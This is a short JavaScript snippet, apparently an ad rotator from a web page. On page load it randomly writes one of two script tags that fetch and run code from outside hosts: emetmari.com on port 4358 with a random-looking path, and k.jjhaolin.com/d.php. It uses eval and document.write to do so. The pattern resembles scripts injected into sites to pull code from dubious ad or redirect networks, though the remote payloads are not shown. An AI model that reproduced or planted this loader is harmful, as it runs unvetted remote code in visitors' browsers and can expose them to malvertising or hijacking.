<script>
var randoms = {
	ads_codes: ['<script>    var s = document.createElement(\'script\');    s.type = \'text/javascript\';    s.async = true;    s.src = \'https://emetmari.com:4358/rikoalvlvc/pffss1lmw0ruklbs4nriea/2078\';    var head = document.getElementsByTagName(\'head\')[0];    head.appendChild(s);<'+'/script>','<script id=\'mob\' type=\'text/javascript\' charset=\'utf-8\' src=\'https://k.jjhaolin.com/d.php?pid=8708\'><'+'/script>'],
	ads_weight: [10,10],

	get_random: function(weight) {
		var s = eval(weight.join('+'));
		var r = Math.floor(Math.random() * s);
		var w = 0;
		var n = weight.length - 1;
		for(var k in weight){w+=weight[k];if(w>=r){n=k;break;}};
		return n;
	},
	init: function() {

		var rand = randoms.get_random(randoms.ads_weight);
		document.write(randoms.ads_codes[rand]);

	}
}
randoms.init();
</script>
